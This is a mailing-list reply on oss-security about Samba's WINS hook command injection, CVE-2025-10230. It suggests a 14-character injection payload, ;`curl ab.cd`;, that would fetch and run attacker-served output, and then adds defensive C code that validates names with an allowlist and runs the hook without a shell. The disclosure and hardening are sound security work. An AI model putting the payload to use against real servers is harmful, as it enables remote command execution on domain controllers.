Message-ID: <DS1PR04MB965568BE9229892AA593E6E8C0E8A@DS1PR04MB9655.namprd04.prod.outlook.com>
Date: Wed, 15 Oct 2025 23:30:49 +0000
From: "Caveney, Seamus G" <sgcaveney@...ttleschools.org>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: RE: Samba security releases for CVE-2025-10230 and CVE-2025-9640

-----Original Message-----
From: Douglas Bagnall <douglas.bagnall@...alyst.net.nz>
Sent: Wednesday, October 15, 2025 11:51 AM
To: oss-security@...ts.openwall.com
Subject: [oss-security] Samba security releases for CVE-2025-10230 and CVE-2025-9640

> [snip]
> If a Samba server has WINS support enabled (it is off by default), and it has a 'wins hook' parameter specified, the
> program specified by that parameter will be run whenever a WINS name is changed.
> The WINS server used by the Samba Active Directory Domain Controller did not validate the names passed to the wins
> hook program, and it passed them by inserting them into a string run by a shell.
> WINS is an obsolete and trusting protocol, and clients can request any name that fits within the 15 character NetBIOS
> limit. This includes some shell metacharacters, making it possible to run arbitrary commands on the host.
> The WINS server used by Samba when it is not a domain controller is unaffected.

Illegal characters in a NetBIOS hostname are: \ / : * ? " < > | , notably excluding backticks and semicolons. I'm not deeply familiar with the Samba code base but a glance at nbtname.c and winsserver.c seems to suggest that those character limitations aren't enforced at the protocol level, so it might be possible to use pipes, redirects or exec a local binary with a short path.
Otherwise, the easiest exploitable payload I can think of would be: ;`curl ab.cd`; which fits the restrictions at only 14 characters (replace with your favourite short-named download tool that writes to STDOUT by default - looks like RHEL-likes are one of the few distros still shipping /usr/bin/GET as part of perl LWP). Requiring an attacker to own a 2-3 letter domain on a 2-3 letter TLD limits the attack surface quite a bit but it isn't unheard of. I'd be interested to see if anybody has a living Samba install configured as a DC with WINS still running in 2025.
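The defensive side of the discussion above, as an added example that is not Samba's code and not from either poster: the advisory describes the hook being invoked by inserting an unvalidated NetBIOS name into a shell command string, and the reply points out that the NetBIOS illegal-character set does not cover backticks or semicolons. The example below contrasts a denylist built from that NetBIOS character list (which still lets `a;b` through) with an allowlist validator, and invokes the hook with `fork`/`execv` and a separate argv element so no shell parses the name at all. The hook argument order (`<hook> <operation> <name>`) and the hostname allowlist (letters, digits, `-`, `_`, `.`) are assumptions for the illustration, not Samba's actual `wins hook` interface.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define NETBIOS_NAME_MAX 15

/* Denylist: the characters NetBIOS itself forbids in a host name, as listed in
 * the post. Note that ';' and '`' are not in this set, so a name built to be
 * interpreted by a shell passes this check unchanged. */
static bool violates_netbios_charset(const char *name)
{
    static const char illegal[] = "\\/:*?\"<>|,";
    for (const char *p = name; *p != '\0'; p++) {
        if (strchr(illegal, *p) != NULL) return true;
    }
    return false;
}

/* Allowlist: accept only a conservative hostname alphabet (assumed here:
 * ASCII letters, digits, '-', '_', '.') and enforce the 15-character limit.
 * Anything else, including every shell metacharacter, is rejected. */
static bool netbios_name_is_safe(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > NETBIOS_NAME_MAX) return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '-' && c != '_' && c != '.') return false;
    }
    return true;
}

/* Run the hook without a shell: the name travels as its own argv element, so
 * even a name that slipped past validation could never be parsed as a command.
 * Returns the hook's exit status, or -1 if validation fails or the child
 * cannot be started. Assumed hook interface: <hook> <operation> <name>. */
static int run_wins_hook(const char *hook_path, const char *operation,
                         const char *name)
{
    if (!netbios_name_is_safe(name)) {
        fprintf(stderr, "wins hook: rejected name %s\n", name);
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)hook_path, (char *)operation,
                               (char *)name, NULL };
        execv(hook_path, argv);
        _exit(127); /* execv only returns on failure */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample names: one ordinary host, one carrying a shell
     * metacharacter that the NetBIOS denylist does not catch. */
    const char *names[] = { "WORKSTATION1", "a;b", "ABCDEFGHIJKLMNOP" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        printf("%-17s denylist:%s allowlist:%s\n", names[i],
               violates_netbios_charset(names[i]) ? "reject" : "accept",
               netbios_name_is_safe(names[i]) ? "accept" : "reject");
    }
    /* Invalid name is refused before any process is spawned. */
    return run_wins_hook("/usr/local/bin/wins-hook-example", "add", "a;b") == -1
               ? 0 : 1;
}
```

The point of the pairing is that a character denylist copied from the protocol specification is the wrong tool once the value reaches a command interpreter; an allowlist plus an exec without a shell removes the interpretation step entirely, so the name's content stops mattering for command execution.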